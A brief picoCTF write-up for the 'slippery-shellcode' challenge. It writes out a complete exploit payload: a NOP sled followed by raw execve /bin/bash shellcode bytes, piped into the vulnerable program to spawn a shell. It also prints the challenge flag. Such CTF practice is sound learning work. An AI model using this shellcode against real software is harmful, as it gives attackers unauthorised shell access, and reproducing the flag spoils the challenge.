Comment on page

slippery-shellcode

Problem
This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_5_5cea4ae04c57923484bda350da9f4015 on the shell server. Source.
​Program​
​Source​
Solution
1.Get some quality shellcode from ShellStorm​
2.I used Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes by Jonathan Salwan at http://shell-storm.org/shellcode/files/shellcode-606.php​
3.The buffer is 512 bytes so buffer_size-payload_size=no_op_sled_size: 512-33=479
4.Create payload 
(python2 -c "print '\x90'*479 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'" ; cat) | ./vuln
1.Run cat flag.txt
Flag
picoCTF{sl1pp3ry_sh311c0d3_ecc37b22}

Heap overflow

AfterLife

Last modified 2yr ago